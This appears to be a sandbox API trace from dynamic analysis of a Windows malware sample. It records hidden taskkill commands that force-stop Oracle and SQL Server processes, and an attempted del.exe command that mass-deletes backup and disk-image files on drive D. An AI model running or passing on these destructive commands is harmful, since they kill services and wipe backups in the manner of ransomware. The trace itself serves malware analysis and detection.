CreatePipe (in: hReadPipe=0x70bea68, hWritePipe=0x70bea64, lpPipeAttributes=0x70be9e8, nSize=0x0 | out: hReadPipe=0x70bea68*=0x4b0, hWritePipe=0x70bea64*=0x504) returned 1 [0149.576] GetCurrentProcess () returned 0xffffffff [0149.576] GetCurrentProcess () returned 0xffffffff [0149.576] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x70bea6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x70bea6c*=0x500) returned 1 [0149.576] CloseHandle (hObject=0x4b0) returned 1 [0149.576] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0149.576] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0149.576] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0149.576] CoTaskMemFree (pv=0x741d20) [0149.576] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM ocautoupds.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x70be9a8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x25227c8 | out: lpCommandLine="\"taskkill.exe\" /IM ocautoupds.exe /F", lpProcessInformation=0x25227c8*(hProcess=0x4f8, hThread=0x4b0, dwProcessId=0x10c4, dwThreadId=0x10ec)) returned 1 [0149.581] CloseHandle (hObject=0x504) returned 1 [0149.581] GetFileType (hFile=0x500) returned 0x3 [0149.581] CloseHandle (hObject=0x4b0) returned 1 [0149.581] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0149.581] CreatePipe (in: hReadPipe=0x70bea68, hWritePipe=0x70bea64, lpPipeAttributes=0x70be9e8, nSize=0x0 | out: hReadPipe=0x70bea68*=0x4b0, hWritePipe=0x70bea64*=0x504) returned 1 [0149.581] GetCurrentProcess () returned 0xffffffff [0149.581] GetCurrentProcess () returned 0xffffffff [0149.581] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x70bea6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x70bea6c*=0x518) returned 1 [0149.581] CloseHandle (hObject=0x4b0) returned 1 [0149.581] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0149.581] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0149.581] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0149.581] CoTaskMemFree (pv=0x741d20) [0149.582] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM ocssd.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x70be9b0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x25260c4 | out: lpCommandLine="\"taskkill.exe\" /IM ocssd.exe /F", lpProcessInformation=0x25260c4*(hProcess=0x3c4, hThread=0x4b0, dwProcessId=0x10fc, dwThreadId=0x1120)) returned 1 [0149.586] CloseHandle (hObject=0x504) returned 1 [0149.586] GetFileType (hFile=0x518) returned 0x3 [0149.586] CloseHandle (hObject=0x4b0) returned 1 [0149.586] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0149.586] CreatePipe (in: hReadPipe=0x70bea68, hWritePipe=0x70bea64, lpPipeAttributes=0x70be9e8, nSize=0x0 | out: hReadPipe=0x70bea68*=0x4b0, hWritePipe=0x70bea64*=0x504) returned 1 [0149.587] GetCurrentProcess () returned 0xffffffff [0149.587] GetCurrentProcess () returned 0xffffffff [0149.587] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x70bea6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x70bea6c*=0x548) returned 1 [0149.587] CloseHandle (hObject=0x4b0) returned 1 [0149.587] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0149.587] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0149.587] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0149.587] CoTaskMemFree (pv=0x741d20) [0149.587] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM oracle.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x70be9b0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x25299b4 | out: lpCommandLine="\"taskkill.exe\" /IM oracle.exe /F", lpProcessInformation=0x25299b4*(hProcess=0x590, hThread=0x4b0, dwProcessId=0x1148, dwThreadId=0x1160)) returned 1 [0149.592] CloseHandle (hObject=0x504) returned 1 [0149.592] GetFileType (hFile=0x548) returned 0x3 [0149.592] CloseHandle (hObject=0x4b0) returned 1 [0149.592] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0149.592] CreatePipe (in: hReadPipe=0x70bea68, hWritePipe=0x70bea64, lpPipeAttributes=0x70be9e8, nSize=0x0 | out: hReadPipe=0x70bea68*=0x4b0, hWritePipe=0x70bea64*=0x504) returned 1 [0149.592] GetCurrentProcess () returned 0xffffffff [0149.592] GetCurrentProcess () returned 0xffffffff [0149.592] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x70bea6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x70bea6c*=0x448) returned 1 [0149.593] CloseHandle (hObject=0x4b0) returned 1 [0149.593] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0149.593] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0149.593] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0149.593] CoTaskMemFree (pv=0x741d20) [0149.593] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM sqlagent.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x70be9ac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x252d2ac | out: lpCommandLine="\"taskkill.exe\" /IM sqlagent.exe /F", lpProcessInformation=0x252d2ac*(hProcess=0x3f0, hThread=0x4b0, dwProcessId=0x1168, dwThreadId=0x1178)) returned 1 [0149.598] CloseHandle (hObject=0x504) returned 1 [0149.598] GetFileType (hFile=0x448) returned 0x3 [0149.598] CloseHandle (hObject=0x4b0) returned 1 [0149.598] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0149.598] CreatePipe (in: hReadPipe=0x70bea68, hWritePipe=0x70bea64, lpPipeAttributes=0x70be9e8, nSize=0x0 | out: hReadPipe=0x70bea68*=0x4b0, hWritePipe=0x70bea64*=0x504) returned 1 [0149.598] GetCurrentProcess () returned 0xffffffff [0149.598] GetCurrentProcess () returned 0xffffffff [0149.598] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x70bea6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x70bea6c*=0x4a0) returned 1 [0149.598] CloseHandle (hObject=0x4b0) returned 1 [0149.598] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0149.598] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0149.598] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0149.598] CoTaskMemFree (pv=0x741d20) [0149.599] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM sqlbrowser.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x70be9a8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x2530bac | out: lpCommandLine="\"taskkill.exe\" /IM sqlbrowser.exe /F", lpProcessInformation=0x2530bac*(hProcess=0x46c, hThread=0x4b0, dwProcessId=0x1254, dwThreadId=0x12a0)) returned 1 [0149.632] CloseHandle (hObject=0x504) returned 1 [0149.632] GetFileType (hFile=0x4a0) returned 0x3 [0149.632] CloseHandle (hObject=0x4b0) returned 1 [0149.632] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0149.632] CreatePipe (in: hReadPipe=0x70bea68, hWritePipe=0x70bea64, lpPipeAttributes=0x70be9e8, nSize=0x0 | out: hReadPipe=0x70bea68*=0x4b0, hWritePipe=0x70bea64*=0x504) returned 1 [0149.633] GetCurrentProcess () returned 0xffffffff [0149.633] GetCurrentProcess () returned 0xffffffff [0149.633] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x70bea6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x70bea6c*=0x514) returned 1 [0149.633] CloseHandle (hObject=0x4b0) returned 1 [0149.633] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0149.633] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0149.633] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0149.633] CoTaskMemFree (pv=0x741d20) [0149.633] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM sqlservr.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x70be9ac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x25344ac | out: lpCommandLine="\"taskkill.exe\" /IM sqlservr.exe /F", lpProcessInformation=0x25344ac*(hProcess=0x52c, hThread=0x4b0, dwProcessId=0x12a8, dwThreadId=0x1328)) returned 1 [0150.170] CloseHandle (hObject=0x504) returned 1 [0150.177] GetFileType (hFile=0x514) returned 0x3 [0150.177] CloseHandle (hObject=0x4b0) returned 1 [0150.181] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.518] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.781] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.833] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.982] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.015] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.186] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.827] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0153.586] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0154.029] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0155.989] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0155.989] CreatePipe (in: hReadPipe=0x70bea68, hWritePipe=0x70bea64, lpPipeAttributes=0x70be9e8, nSize=0x0 | out: hReadPipe=0x70bea68*=0x558, hWritePipe=0x70bea64*=0x5dc) returned 1 [0155.989] GetCurrentProcess () returned 0xffffffff [0155.989] GetCurrentProcess () returned 0xffffffff [0155.989] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x558, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x70bea6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x70bea6c*=0x5a8) returned 1 [0155.989] CloseHandle (hObject=0x558) returned 1 [0155.990] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0155.990] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0155.990] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0155.990] CoTaskMemFree (pv=0x741d20) [0155.990] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"del.exe\" /s /f /q d:\\*.VHD d:\\*.bac d:\\*.bak d:\\*.wbcat d:\\*.bkf d:\\Backup*.* d:\\backup*.* d:\\*.set d:\\*.win d:\\*.dsk", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x70be904*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x5dc, hStdError=0x0), lpProcessInformation=0x256f508 | out: lpCommandLine="\"del.exe\" /s /f /q d:\\*.VHD d:\\*.bac d:\\*.bak d:\\*.wbcat d:\\*.bkf d:\\Backup*.* d:\\backup*.* d:\\*.set d:\\*.win d:\\*.dsk", lpProcessInformation=0x256f508*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0155.990] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x70be838, nSize=0x101, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0155.991] CloseHandle (hObject=0x5dc) returned 1 [0155.992] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.006] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.007] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.009] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.011] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.012] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.013] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.018] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.019] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.020] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0176.448] CoUninitialize () Thread: id = 775 os_tid = 0xf5c Thread: id = 821 os_tid = 0x690 Thread: id = 857 os_tid = 0x1228 Thread: id = 878 os_tid = 0x1258 Thread: id = 949 os_tid = 0x1294 Thread: id = 980 os_tid = 0x1058 Thread: id = 1277 os_tid = 0x1250 Thread: id = 1279 os_tid = 0xc74 Thread: id = 1337 os_tid = 0xf58 [0222.642] CoGetContextToken (in: pToken=0x5d6f68c | out: pToken=0x5d6f68c) returned 0x0 [0222.642] IUnknown:QueryInterface (in: This=0x6ded28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5d6f6b0 | out: ppvObject=0x5d6f6b0*=0x6ded34) returned 0x0 [0222.642] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ded34, pThreadType=0x5d6f6dc | out: pThreadType=0x5d6f6dc*=0) returned 0x0 [0222.642] IUnknown:Release (This=0x6ded34) returned 0x1 Thread: id = 1396 os_tid = 0xd28 Thread: id = 1397 os_tid = 0x3ac [0245.725] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0245.726] CoGetContextToken (in: pToken=0x5dcf6e4 | out: pToken=0x5dcf6e4) returned 0x0 [0245.726] IUnknown:QueryInterface (in: This=0x6ded28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5dcf708 | out: ppvObject=0x5dcf708*=0x6ded34) returned 0x0 [0245.726] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ded34, pThreadType=0x5dcf734 | out: pThreadType=0x5dcf734*=0) returned 0x0 [0245.726] IUnknown:Release (This=0x6ded34) returned 0x1 [0245.726] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0245.726] CoUninitialize () [0245.728] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.735] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.735] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.735] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.736] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.737] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.738] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.738] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.738] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.738] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.738] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.738] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.738] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.738] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.738] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.738] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.738] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.738] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.624] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.669] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.686] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.693] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.702] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.711] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.738] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.739] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.739] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.740] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.741] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.742] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.742] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.743] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.743] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.743] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.743] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.744] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.744] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.745] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.745] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.746] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.749] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.749] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.749] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.758] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.961] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.988] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.023] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.066] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.122] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.161] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.215] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.257] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.309] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.351] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.365] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.405] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.471] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.513] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.525] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.574] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.644] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.650] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.682] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.690] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.726] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.773] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.819] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.866] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.903] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.905] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.943] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.990] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.050] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.084] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.131] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.178] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.224] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.271] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.318] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.353] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.396] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.880] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.925] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0248.973] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.020] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.059] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.098] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 